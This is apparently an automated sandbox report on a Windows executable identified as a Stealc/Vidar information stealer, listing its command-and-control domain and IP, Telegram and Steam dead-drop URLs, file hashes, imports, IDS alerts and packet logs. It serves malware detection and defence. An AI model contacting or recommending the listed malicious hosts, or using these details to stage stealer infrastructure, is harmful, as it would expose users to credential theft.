Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199802540894	false		high
https://b2een.xyz/sqlite3.dll	true	Avira URL Cloud: malware	unknown
https://b2een.xyz/	true	Avira URL Cloud: malware	unknown
https://t.me/fu4chmo	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t.me/	file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.telegram.org	file.exe, 00000000.00000003.2252456986.0000000003595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/fu4chmof	file.exe, 00000000.00000002.2582970427.0000000003564000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/fu4chmor08etMozilla/5.0	file.exe	false		high
https://b2een.xyzHJJJJKEG	file.exe, 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/O	file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0	file.exe	false		high
https://b2een.xyz/bi	file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://t.me/fu4chmo338	file.exe, 00000000.00000003.2252456986.0000000003595000.00000004.00000020.00020000.00000000.sdmp	false		high
https://b2een.xyztosh;	file.exe, 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://b2een.xyz	file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false
49.13.32.95	b2een.xyz	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562215
Start date and time:	2024-11-25 10:58:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/1@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 99
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
04:59:29	API Interceptor	1x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
49.13.32.95	21Installer.exe	Get hash	malicious	Stealc, Vidar	Browse
49.13.32.95	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	21Installer.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://account.metasystemchat.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/	Get hash	malicious	Unknown	Browse	46.105.201.240
	https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQ	Get hash	malicious	Unknown	Browse	46.105.201.240

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
HETZNER-ASDE	http://google.com	Get hash	malicious	Unknown	Browse	94.130.197.138
	rbCoIEGfDf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.107.151.211
	LWv5DuboZh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.107.151.211
	file.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	144.79.19.125
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	5.9.250.61
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	49.13.42.140
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	148.251.123.125
	21Installer.exe	Get hash	malicious	Stealc, Vidar	Browse	49.13.32.95
	file.exe	Get hash	malicious	LummaC	Browse	176.9.162.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	412300061474#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.99 49.13.32.95
	Cargo Invoice_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	URGENT!! DHL invoice SG00101637 Adobe#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.99 49.13.32.95
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.99 49.13.32.95
	Outstanding Invoices_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 49.13.32.95
	2aiDfP0r7h.lnk	Get hash	malicious	Unknown	Browse	149.154.167.99 49.13.32.95

Process:	C:\Users\user\Desktop\file.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:8aaRaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaG:LaJ
MD5:	B4A41A33E9575CEE3383877E7CC144F2
SHA1:	6B7F929E52318DDA00F3300352FD9E8AD72E3991
SHA-256:	E2BFF1AB8FCD76129B0C9A35060ADD3F41D7FB450C3BE307D36D6E18B1348F21
SHA-512:	73F35FB2721F6455438C22C0215869BFD8FD37BD8E397C077D29F11A274F81363153276E48AED441E8E38B14286E900371187F547A24A244B85D53D7D16D6641
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.610388728923203
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	281'600 bytes
MD5:	0abcf5f274cf19c6f9c75954e9b6a182
SHA1:	e39e1cecaffce08ffd9388ded9e13132e1eb6d51
SHA256:	54267849112931dc771eac100a8e3302f224f5071cc6211723e5acf89bf69156
SHA512:	c61dc07371b03d9a959ff7caac8265eea345fa78e4939d0a4d9491ef879287046ec6e0847b4067c3043fb97f4c1f94c2ac0f5bbc9ba18716ef6e02a4268f02fd
SSDEEP:	6144:dh0ZpFC4sffny7TuLBdZlT4DIJYdy3F8ioyrN:dh0ZpFCfB3TGyYy3uiBZ
TLSH:	06548D1163607C3BF2225074B70D97768A6B7C342A529F0BFBD50675AFF42E2AA1071B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`...`...`.....c.x.....V.p.....b._...i.K.e...i.[.t.......c...`.........g.p.....U.a...Rich`...................PE..L....Y@g...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x419c8d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x674059D2 [Fri Nov 22 10:15:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b8c3b7f5974cb002243977711d52689

Entrypoint Preview

Instruction
je 00007F71346B02E5h
jne 00007F71346B02E3h
mov eax, FE8EC1E8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+000184E8h], edi
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-018BCA18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A4018h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A4A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A5418h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01885818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A6818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A7218h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A7C18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01886818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A9018h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A9A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AA418h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01883918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AB818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AC218h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018ACC18h], edi
jmp far eax
adc byte ptr [ecx-02h], bh
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018ADB18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax+00000000h], edi

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d008	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x253000	0xb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x254000	0x33c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x31000	0x2fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2fc12	0x2fe00	490359d2039bed1fe9201133edd5b2c6	False	0.5156351990861618	data	6.45972522155846	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x31000	0xcfdc	0xd000	84b5701cb60caec63cadddf6becbc801	False	0.6000037560096154	data	6.354978643508817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x214e8c	0x2e00	bc8ce1400528fb4eab6391619c257014	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x253000	0xb0	0x200	0bcee7bb60016f2b43c07f17c9314bb7	False	0.279296875	data	4.106523643281409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x254000	0x4926	0x4a00	4745d41da41e74179f7cadb66ce2568b	False	0.5707875844594594	data	5.533816308624364	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x253058	0x56	ASCII text, with CRLF line terminators	English	United States	1.0232558139534884

Imports

DLL	Import
msvcrt.dll	_mbscmp, _splitpath, memmove, strstr, strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, strcpy_s, memchr, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, _ismbcupper, __CxxFrameHandler3
KERNEL32.dll	GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, HeapSetInformation, GetCommandLineA, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, CreateFileA, GetFileSize, FreeLibrary, GetThreadContext, SetThreadContext, SetHandleCount, VirtualAllocEx, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, FindFirstFileA, GetLogicalDriveStringsA, FindClose, FindNextFileA, CreateThread, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, HeapCreate, RtlUnwind, EnterCriticalSection, FatalAppExitA, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, DecodePointer, EncodePointer, IsDebuggerPresent, SetUnhandledExceptionFilter, HeapReAlloc, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, ReadProcessMemory, GetStringTypeW, UnhandledExceptionFilter, TerminateProcess, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, IsProcessorFeaturePresent, SetConsoleCtrlHandler, InterlockedExchange, GetLocaleInfoW, LoadLibraryW, TlsSetValue
USER32.dll	wsprintfA, GetDesktopWindow, OpenDesktopA, CreateDesktopA, CloseDesktop, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
GDI32.dll	CreateDCA, GetDeviceCaps
ADVAPI32.dll	RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll	SHFileOperationA, SHGetFolderPathA
ole32.dll	CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll	VariantClear, SysFreeString, VariantInit, SysAllocString
PSAPI.DLL	GetModuleBaseNameA, EnumProcessModules
WS2_32.dll	connect, WSAStartup, getaddrinfo, htons, WSACleanup, recv, socket, freeaddrinfo, closesocket, send
SHLWAPI.dll	PathFileExistsA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T10:59:27.922634+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.13.32.95	443	192.168.2.5	49736	TCP
2024-11-25T10:59:30.343541+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49742	49.13.32.95	443	TCP
2024-11-25T10:59:30.343771+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.13.32.95	443	192.168.2.5	49742	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 10:59:15.464981079 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:15.465008974 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:15.465178013 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:15.494321108 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:15.494339943 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:16.913274050 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:16.913341045 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:16.971658945 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:16.971677065 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:16.972166061 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:16.973320007 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:16.975517988 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.023334980 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.474513054 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.474541903 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.474567890 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.474586010 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.474601984 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.474616051 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.474641085 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.474754095 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.477062941 CET	49709	443	192.168.2.5	149.154.167.99
Nov 25, 2024 10:59:17.477073908 CET	443	49709	149.154.167.99	192.168.2.5
Nov 25, 2024 10:59:17.820622921 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:17.820669889 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:17.820777893 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:17.821099997 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:17.821111917 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.156826019 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.156904936 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.168950081 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.168956041 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.169222116 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.169271946 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.169702053 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.211332083 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.886327028 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.886410952 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.886423111 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.886451006 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.889115095 CET	49717	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.889133930 CET	443	49717	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.895150900 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.895200014 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:20.895267963 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.895472050 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:20.895484924 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:22.343857050 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:22.343955040 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:22.344664097 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:22.344675064 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:22.350766897 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:22.350774050 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:23.242762089 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:23.242835999 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:23.242842913 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.242922068 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.243089914 CET	49724	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.243108034 CET	443	49724	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:23.250118971 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.250154972 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:23.250231028 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.250453949 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:23.250464916 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:24.653515100 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:24.653575897 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:24.654231071 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:24.654244900 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:24.655814886 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:24.655819893 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.551510096 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.551537037 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.551599026 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.551631927 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.551675081 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.551973104 CET	49730	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.551990986 CET	443	49730	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.560493946 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.560520887 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:25.560615063 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.560800076 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:25.560807943 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.005903006 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.005995989 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.006544113 CET	49736	443	192.168.2.5	49.13.32.95
Nov 25, 2024 10:59:27.006547928 CET	443	49736	49.13.32.95	192.168.2.5
Nov 25, 2024 10:59:27.008147955 CET	49736	443	192.168.2.5	49.13.32.95
